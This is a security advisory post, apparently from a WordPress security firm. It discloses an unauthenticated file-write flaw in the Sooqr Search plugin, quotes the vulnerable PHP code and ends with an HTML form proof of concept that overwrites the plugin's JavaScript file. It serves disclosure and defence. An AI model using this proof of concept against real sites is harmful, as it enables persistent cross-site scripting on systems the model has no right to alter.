Our Proactive Monitoring Caught a Restricted File Upload Vulnerability in Sooqr Search
Much like what we found with the plugin the plugin Analytics-Gtag earlier this week, our proactive monitoring of changes made to WordPress plugins in the Plugin Directory to try to catch serious vulnerabilities has caught a restricted file upload in the plugin Sooqr Search, which could most obviously be used to cause persistent cross-site scripting (XSS) since it allows arbitrary content to be written to a JavaScript file. It also could, say, be combined with a local file inclusion (LFI) vulnerability, to cause arbitrary code to be executed.
The plugin registers the function sooqr_save_javascript() to run during admin_init:
176 | $this->loader->sooqr_add_action('admin_init', $plugin_admin, 'sooqr_save_javascript'); |
That allows the function to be run when accessing an admin page, which doesn’t require that someone be logged in to access it. That is common starting point for vulnerabilities, including exploited vulnerabilities, so any function that runs then is something we check during the security reviews we do of plugins.
When that function runs if the POST input “snippetjs” exists, then what is submitted as its value is saved to the file /wp-content/plugins/sooqr-site-search/public/js/sooqrsearch.js:
976 977 978 979 980 981 | public function sooqr_save_javascript() { if (isset($_POST['snippetjs'])) { $file = plugin_dir_path(__DIR__) . 'public/js/sooqrsearch.js'; $content = file_get_contents($file); file_put_contents($file, stripslashes($_POST['snippetjs'])); |
If the plugin’s functionality is enabled, that file will be loaded when visiting frontend pages of the website.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.
Proof of Concept
The following proof of concept will save the specified user input to the file /wp-content/plugins/sooqr-site-search/public/js/sooqrsearch.js.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[file contents]” with the contents to be placed in the file.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST"> <input type="hidden" name="snippetjs" value="[file contents]" /> <input type="submit" value="Submit" /> </form> </body> </html>